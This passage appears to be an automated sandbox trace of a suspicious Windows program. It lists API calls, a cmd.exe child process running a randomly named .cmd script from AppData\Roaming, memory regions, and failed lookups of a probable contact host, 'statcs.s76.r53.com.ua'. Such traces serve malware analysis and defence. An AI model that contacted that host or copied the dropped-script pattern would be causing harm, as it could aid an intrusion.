wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] VirtualFree (lpAddress=0x1300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.842] FreeLibrary (hLibModule=0x76910000) returned 1 [0097.842] LocalFree (hMem=0x154458) returned 0x0 [0097.842] FreeLibrary (hLibModule=0x76910000) returned 1 [0097.842] LocalFree (hMem=0x154448) returned 0x0 [0097.842] ExitProcess (uExitCode=0x0) Thread: id = 24 os_tid = 0xba0 [0097.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f8514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0097.383] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1431ffc, cbMultiByte=27, lpWideCharStr=0x153ed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0097.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0097.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x13ea714, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0097.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0097.383] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x153fb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x153fbac | out: ppResult=0x153fbac*=0x0) returned 11001 [0097.451] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x153fb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x153fbac | out: ppResult=0x153fbac*=0x0) returned 11001 [0097.545] getnameinfo (in: pSockaddr=0x153fc14, SockaddrLength=0x0, pNodeBuffer=0x134831c, NodeBufferSize=0x401, pServiceBuffer=0x1415124, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="", pServiceBuffer="") returned 10047 [0097.545] htons (hostshort=0x0) returned 0x0 [0097.545] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0097.545] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] SetEvent (hEvent=0x84) returned 1 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] CloseHandle (hObject=0xb8) returned 1 [0097.545] RtlExitUserThread (Status=0x0) Thread: id = 26 os_tid = 0xbb0 Process: id = "18" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168a0" os_pid = "0xb88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xae4" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1205 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1206 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1207 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1208 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1209 start_va = 0x4a0f0000 end_va = 0x4a13bfff entry_point = 0x4a0f0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1210 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1211 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1212 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1213 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1214 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1433 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1434 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1435 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1436 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1437 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1438 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1439 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1440 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1441 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1442 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1443 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1444 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1445 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1446 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1447 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1448 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1449 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1450 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1451 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1452 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1453 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1454 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1455 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1456 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 1470 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1471 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1472 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1473 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1474 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 21 os_tid = 0xb8c [0098.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22ff74 | out: lpSystemTimeAsFileTime=0x22ff74*(dwLowDateTime=0x78bc3d00, dwHighDateTime=0x1d440a9)) [0098.527] GetCurrentProcessId () returned 0xb88 [0098.527] GetCurrentThreadId () returned 0xb8c [0098.528] GetTickCount () returned 0x2387d [0098.528] QueryPerformanceCounter (in: lpPerformanceCount=0x22ff6c | out: lpPerformanceCount=0x22ff6c*=15531676113) returned 1 [0098.528] GetModuleHandleA (lpModuleName=0x0) returned 0x4a0f0000 [0098.528] __set_app_type (_Type=0x1) [0098.528] __p__fmode () returned 0x76b331f4 [0098.528] __p__commode () returned 0x76b331fc [0098.529] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1121a6) returned 0x0 [0098.529] __getmainargs (in: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c, _DoWildCard=0, _StartInfo=0x4a114140 | out: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c) returned 0 [0098.529] GetCurrentThreadId () returned 0xb8c [0098.529] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb8c) returned 0x38 [0098.529] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0098.529] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0098.529] SetThreadUILanguage (LangId=0x0) returned 0x409 [0098.530] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0098.530] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22ff04 | out: phkResult=0x22ff04*=0x0) returned 0x2 [0098.530] VirtualQuery (in: lpAddress=0x22ff3b, lpBuffer=0x22fed4, dwLength=0x1c | out: lpBuffer=0x22fed4*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0098.530] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fed4, dwLength=0x1c | out: lpBuffer=0x22fed4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0098.530] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fed4, dwLength=0x1c | out: lpBuffer=0x22fed4*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0098.530] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fed4, dwLength=0x1c | out: lpBuffer=0x22fed4*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0098.530] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fed4, dwLength=0x1c | out: lpBuffer=0x22fed4*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0098.530] GetConsoleOutputCP () returned 0x1b5 [0098.530] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0098.530] SetConsoleCtrlHandler (HandlerRoutine=0x4a10e72a, Add=1) returned 1 [0098.530] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.530] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0098.530] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.530] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0098.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.531] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0098.531] _get_osfhandle (_FileHandle=0) returned 0x3 [0098.531] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0098.531] _get_osfhandle (_FileHandle=0) returned 0x3 [0098.531] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0098.531] GetEnvironmentStringsW () returned 0x390150* [0098.531] FreeEnvironmentStringsW (penv=0x390150) returned 1 [0098.532] GetEnvironmentStringsW () returned 0x390150* [0098.532] FreeEnvironmentStringsW (penv=0x390150) returned 1 [0098.532] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ee74 | out: phkResult=0x22ee74*=0x40) returned 0x0 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x0, lpData=0x22ee80*=0x0, lpcbData=0x22ee78*=0x1000) returned 0x2 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x4, lpData=0x22ee80*=0x1, lpcbData=0x22ee78*=0x4) returned 0x0 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x0, lpData=0x22ee80*=0x1, lpcbData=0x22ee78*=0x1000) returned 0x2 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x4, lpData=0x22ee80*=0x0, lpcbData=0x22ee78*=0x4) returned 0x0 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x4, lpData=0x22ee80*=0x40, lpcbData=0x22ee78*=0x4) returned 0x0 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x4, lpData=0x22ee80*=0x40, lpcbData=0x22ee78*=0x4) returned 0x0 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x0, lpData=0x22ee80*=0x40, lpcbData=0x22ee78*=0x1000) returned 0x2 [0098.532] RegCloseKey (hKey=0x40) returned 0x0 [0098.532] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ee74 | out: phkResult=0x22ee74*=0x40) returned 0x0 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x0, lpData=0x22ee80*=0x40, lpcbData=0x22ee78*=0x1000) returned 0x2 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x4, lpData=0x22ee80*=0x1, lpcbData=0x22ee78*=0x4) returned 0x0 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x0, lpData=0x22ee80*=0x1, lpcbData=0x22ee78*=0x1000) returned 0x2 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x4, lpData=0x22ee80*=0x0, lpcbData=0x22ee78*=0x4) returned 0x0 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x4, lpData=0x22ee80*=0x9, lpcbData=0x22ee78*=0x4) returned 0x0 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x4, lpData=0x22ee80*=0x9, lpcbData=0x22ee78*=0x4) returned 0x0 [0098.533] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x0, lpData=0x22ee80*=0x9, lpcbData=0x22ee78*=0x1000) returned 0x2 [0098.533] RegCloseKey (hKey=0x40) returned 0x0 [0098.533] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88634b [0098.533] srand (_Seed=0x5b88634b) [0098.533] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd\"" [0098.533] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd\"" [0098.533] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0098.533] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3919b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0098.533] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0098.533] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0098.533] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0098.533] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.534] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0098.534] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0098.534] _wcsicmp 